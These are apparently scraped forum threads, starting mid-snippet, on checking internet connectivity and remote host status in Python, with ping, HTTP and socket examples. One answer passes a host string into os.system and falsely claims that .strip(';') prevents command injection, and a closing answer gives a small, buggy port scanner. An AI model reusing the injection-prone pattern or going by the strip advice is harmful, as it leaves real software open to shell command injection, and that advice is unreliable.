mem1 = mem2
print ("Internet is working") #Will be executed on state change
except Exception as e:
mem2 = 0
if (mem2 == mem1):
pass
else:
mem1 = mem2
print ("Internet is down")
time.sleep(10) #timeInterval for checking
For my projects I use script modified to ping the google public DNS server 8.8.8.8. Using a timeout of 1 second and core python libraries with no external dependencies:
import struct
import socket
import select
def send_one_ping(to='8.8.8.8'):
ping_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname('icmp'))
checksum = 49410
header = struct.pack('!BBHHH', 8, 0, checksum, 0x123, 1)
data = b'BCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwx'
header = struct.pack(
'!BBHHH', 8, 0, checksum, 0x123, 1
)
packet = header + data
ping_socket.sendto(packet, (to, 1))
inputready, _, _ = select.select([ping_socket], [], [], 1.0)
if inputready == []:
raise Exception('No internet') ## or return False
_, address = ping_socket.recvfrom(2048)
print(address) ## or return True
send_one_ping()
The select timeout value is 1, but can be a floating point number of choice to fail more readily than the 1 second in this example.
Make sure your pip is up to date by running
pip install --upgrade pip
Install the requests package using
pip install requests
import requests
import webbrowser
url = "http://www.youtube.com"
timeout = 6
try:
request = requests.get(url, timeout=timeout)
print("Connected to the Internet")
print("browser is loading url")
webbrowser.open(url)
except (requests.ConnectionError, requests.Timeout) as exception:
print("poor or no internet connection.")
import requests and try this simple python code.
def check_internet():
url = 'http://www.google.com/'
timeout = 5
try:
_ = requests.get(url, timeout=timeout)
return True
except requests.ConnectionError:
return False
I just want to refer to Ivelin's solution, because I can't comment there.
In python 2.7 with an old SSL certificate (in my case, not possible to update, which is another story), there is a possibility of a Certificate Error. In that case, replacing '8.8.8.8' with 'dns.google' or '8888.google' can help.
Hope this will someone helps too.
try:
import httplib # python < 3.0
except:
import http.client as httplib
def have_internet():
conn = httplib.HTTPSConnection("8888.google", timeout=5)
try:
conn.request("HEAD", "/")
return True
except Exception:
return False
finally:
conn.close()

Check if remote host is up in Python

How would I check if the remote host is up without having a port number? Is there any other way I could check other then using regular ping.
There is a possibility that the remote host might drop ping packets
This worked fine for me:
HOST_UP = True if os.system("ping -c 1 " + SOMEHOST) is 0 else False
A protocol-level PING is best, i.e., connecting to the server and interacting with it in a way that doesn't do real work. That's because it is the only real way to be sure that the service is up. An ICMP ECHO (a.k.a. ping) would only tell you that the other end's network interface is up, and even then might be blocked; FWIW, I have seen machines where all user processes were bricked but which could still be pinged. In these days of application servers, even getting a network connection might not be enough; what if the hosted app is down or otherwise non-functional? As I said, talking sweet-nothings to the actual service that you are interested in is the best, surest approach.
HOST_UP = True if os.system("ping -c 5 " + SOMEHOST.strip(";")) is 0 else False
to remove nasty script execution just add .strip(";")
-c 5
to increase the number of ping requests, if all pass than True
PS. Works only on Linux, on Windows always returns True
The best you can do is:
Try and connect on a known port (eg port 80 or 443 for HTTP or HTTPS); or
Ping the site. See Ping a site in Python?
Many sites block ICMP (the portocol used to ping sites) so you must know beforehand if the host in question has it enabled or not.
Connecting to a port tells you mixed information. It really depends on what you want to know. A port might be open but the site is effectively hung so you may get a false positive. A more stringent approach might involve using a HTTP library to execute a Web request against a site and see if you get back a response.
It really all depends on what you need to know.
Many firewalls are configured to drop ping packets without responding. In addition, some network adapters will respond to ICMP ping requests without input from the operating system network stack, which means the operating system might be down, but the host still responds to pings (usually you'll notice if you reboot the server, say, it'll start responding to pings some time before the OS actually comes up and other services start up).
The only way to be certain that a host is up is to actually try to connect to it via some well-known port (e.g. web server port 80).
Why do you need to know if the host is "up", maybe there's a better way to do it.
What about trying something that requires a RPC like a 'tasklist' command in conjunction with a ping?
I would use a port scanner. Original question states that you don't want to use a port. Then you need to specify which Protocol (Yes, this needs a port) you want to monitor: HTTP, VNC, SSH, etc. In case you want to monitor via ICMP you can use subprocess and control ping parameters, number of pings, timeout, size, etc.
import subprocess
try:
res = subprocess.Popen(['ping -t2 -c 4 110.10.0.254 &> /dev/null; echo $?'],shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out, err = res.communicate()
out = out.rstrip()
err = err.rstrip()
print 'general.connectivity() Out: ' + out
print 'general.connectivity() Err: ' + err
if(out == "0"):
print 'general.connectivity() Successful'
return True
print 'general.connectivity() Failed'
return False
except Exception,e:
print 'general.connectivity() Exception'
return False
In case you want a port scanner
import socket
from functools import partial
from multiprocessing import Pool
from multiprocessing.pool import ThreadPool
from errno import ECONNREFUSED
NUM_CORES = 4
def portscan(target,port):
try:
# Create Socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socketTimeout = 5
s.settimeout(socketTimeout)
s.connect((target,port))
print('port_scanner.is_port_opened() ' + str(port) + " is opened")
return port
except socket.error as err:
if err.errno == ECONNREFUSED:
return False
# Wrapper function that calls portscanner
def scan_ports(server=None,port=None,portStart=None,portEnd=None,**kwargs):
p = Pool(NUM_CORES)
ping_host = partial(portscan, server)
if portStart and portStart:
return filter(bool, p.map(ping_host, range(portStart, portStart)))
else:
return filter(bool, p.map(ping_host, range(port, port+1)))
# Check if port is opened
def is_port_opened(server=None,port=None, **kwargs):
print('port_scanner.is_port_opened() Checking port...')
try:
# Add More proccesses in case we look in a range
pool = ThreadPool(processes=1)
try:
ports = list(scan_ports(server=server,port=int(port)))
print("port_scanner.is_port_opened() Port scanner done.")
if len(ports)!=0:
print('port_scanner.is_port_opened() ' + str(len(ports)) + " port(s) available.")
return True
else:
print('port_scanner.is_port_opened() port not opened: (' + port +')')
return False
except Exception, e:
raise
except Exception,e:
print e
raise

Categories

Resources